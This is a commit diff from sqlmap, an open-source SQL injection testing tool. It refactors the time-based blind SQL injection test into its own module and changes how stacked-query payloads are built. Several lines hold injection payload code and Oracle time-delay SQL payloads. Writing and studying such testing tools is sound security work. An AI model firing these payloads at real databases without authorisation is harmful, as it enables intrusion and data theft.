Properly moved and improved inject.goStacked() function and newly

implemented Time based blind SQL injection now is a single test file within the lib/techniques/ folder. Renamed lib/techniques/inference to lib/techniques/blind, it is more approriate and adapted the rest of the libraries. Updated ChangeLog file.
2025-11-04 09:57:38 +03:00 · 2008-11-12 23:44:09 +00:00 · 2008-11-12 23:44:09 +00:00 · ecc4a98071
commit ecc4a98071
parent 9329f8c9c4
10 changed files with 63 additions and 31 deletions
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@ -2,10 +2,17 @@ sqlmap (0.6.3-1) stable; urgency=low
  * Minor enhancement to be able to specify the number of seconds to wait
    between each HTTP request;
  * Minor enhancement to be able to enumerate table columns and dump table
    entries also if the database name is not provided by using the current
    database on MySQL and MSSQL, the 'public' scheme on PostgreSQL and the
    'USERS' TABLESPACE_NAME on Oracle;
  * Minor improvements to sqlmap Debian package files: sqlmap uploaded
    to official Debian project repository;
  * Minor bug fix to handle session.error and session.timeout in HTTP
    requests;
  * Minor bug fix so that when the user provide a SELECT statement to be
    processed with an asterisk as columns, now it also work if in the FROM
    there is no database name specified;
  * Minor bug fix to correctly dump table entries when the column is
    provided;
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@ -31,6 +31,7 @@ from lib.core.data import kb
 from lib.core.dump import dumper
 from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.settings import SUPPORTED_DBMS
 from lib.techniques.blind.timebased import timeTest
 from lib.techniques.inband.union.test import unionTest
@ -70,7 +71,7 @@ def action():
    # Techniques options
    if conf.timeTest:
-        dumper.string("time based sql injection", conf.dbmsHandler.timeTest())
+        dumper.string("time based blind sql injection payload", timeTest())
    if conf.unionTest:
        dumper.string("valid union", unionTest())
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -65,4 +65,4 @@ ORACLE_ALIASES    = [ "oracle", "orcl", "ora", "or" ]
 SUPPORTED_DBMS    = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES
-TIME_SECONDS      = 5
+TIME_DELAY        = 5
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@ -38,10 +38,10 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.data import temp
-from lib.core.settings import TIME_SECONDS
+from lib.core.settings import TIME_DELAY
 from lib.request.connect import Connect as Request
 from lib.techniques.inband.union.use import unionUse
-from lib.techniques.inference.blind import bisection
+from lib.techniques.blind.inference import bisection
 from lib.utils.resume import queryOutputLength
 from lib.utils.resume import resume
@ -388,8 +388,9 @@ def goStacked(expression, timeTest=False):
    TODO: write description
    """
    comment        = queries[kb.dbms].comment
    query          = agent.prefixQuery("; %s" % expression)
-    query          = agent.postfixQuery(query)
+    query          = agent.postfixQuery("%s; %s" % (query, comment))
    payload        = agent.payload(newValue=query)
    start    = time.time()
@ -397,6 +398,6 @@ def goStacked(expression, timeTest=False):
    duration = int(time.time() - start)
    if timeTest:
-        return (duration >= TIME_SECONDS, payload)
+        return (duration >= TIME_DELAY, payload)
    else:
-        return duration >= TIME_SECONDS
+        return duration >= TIME_DELAY
--- a/lib/techniques/inference/init.py
+++ b/lib/techniques/inference/init.py
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
--- a/lib/techniques/blind/timebased.py
+++ b/lib/techniques/blind/timebased.py
@ -0,0 +1,45 @@
 #!/usr/bin/env python
 """
 $Id$
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.settings import TIME_DELAY
 from lib.request import inject
 def timeTest():
    infoMsg  = "testing time based blind sql injection on parameter "
    infoMsg += "'%s'" % kb.injParameter
    logger.info(infoMsg)
    query    = queries[kb.dbms].timedelay % TIME_DELAY
    timeTest = inject.goStacked(query, timeTest=True)
    if timeTest[0] == True:
        return timeTest[1]
    else:
        return None
--- a/lib/utils/resume.py
+++ b/lib/utils/resume.py
@ -32,7 +32,7 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.unescaper import unescaper
-from lib.techniques.inference.blind import bisection
+from lib.techniques.blind.inference import bisection
 def queryOutputLength(expression, payload):
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@ -39,7 +39,6 @@ from lib.core.exception import sqlmapMissingMandatoryOptionException
 from lib.core.exception import sqlmapNoneDataException
 from lib.core.exception import sqlmapUndefinedMethod
 from lib.core.exception import sqlmapUnsupportedFeatureException
 from lib.core.settings import TIME_SECONDS
 from lib.core.shell import autoCompletion
 from lib.core.unescaper import unescaper
 from lib.request import inject
@ -69,27 +68,6 @@ class Enumeration:
        temp.inference              = queries[dbms].inference
    # TODO: move this function to an appropriate file
    def timeTest(self):
        infoMsg  = "testing time based blind sql injection on parameter "
        infoMsg += "'%s'" % kb.injParameter
        logger.info(infoMsg)
        # TODO: probably the '; <COMMENT>' will be filled in in all
        # future time based SQL injection attacks at the end of the
        # stacked query. Find a way that goStacked() function itself
        # append it.
        query  = "%s; " % queries[kb.dbms].timedelay % TIME_SECONDS
        query += queries[kb.dbms].comment
        self.timeTest = inject.goStacked(query, timeTest=True)
        if self.timeTest[0] == True:
            return "True, verified with payload: %s" % self.timeTest[1]
        else:
            return "False"
    def forceDbmsEnum(self):
        pass
--- a/xml/queries.xml
+++ b/xml/queries.xml
@ -72,7 +72,7 @@
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--"/>
-        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="SELECT UTL_INADDR.get_host_name('10.0.0.%d') FROM DUAL"/>
+        <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
        <substring query="SUBSTR((%s), %d, %d)"/>
        <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
        <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
`@ -65,4 +65,4 @@ ORACLE_ALIASES = [ "oracle", "orcl", "ora", "or" ]`

	`SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES`	`SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES`

	`TIME_SECONDS = 5`	`TIME_DELAY = 5`